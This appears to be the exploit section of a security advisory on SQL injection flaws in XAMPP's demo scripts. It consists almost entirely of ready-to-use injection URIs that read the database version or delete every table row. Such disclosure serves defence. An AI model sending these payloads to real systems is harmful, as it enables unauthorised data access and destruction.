• info
• discussion
• exploit
• solution
• references

XAMPP Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/xampp/cds.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://www.example.com/xampp/cds.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)
http://www.example.com/xampp/cds.php?titel=1&interpret=',1),(version(),1,1)/** (mq off)
http://www.example.com/xampp/phonebook.php?action=del&id=-1%20or%201=1
http://www.example.com/xampp/phonebook.php?lastname=',version())/*&firstname=1 (mq off)
http://www.example.com/xampp/phonebook.php?firstname=',version(),1)/* (mq off)
http://www.example.com/xampp/phonebook.php?firstname=1&phone='),(version(),1,'1 (mq off)
http://www.example.com/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register globals on)
http://www.example.com/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://www.example.com/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/* (mq off)
http://www.example.com/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/* (mq off)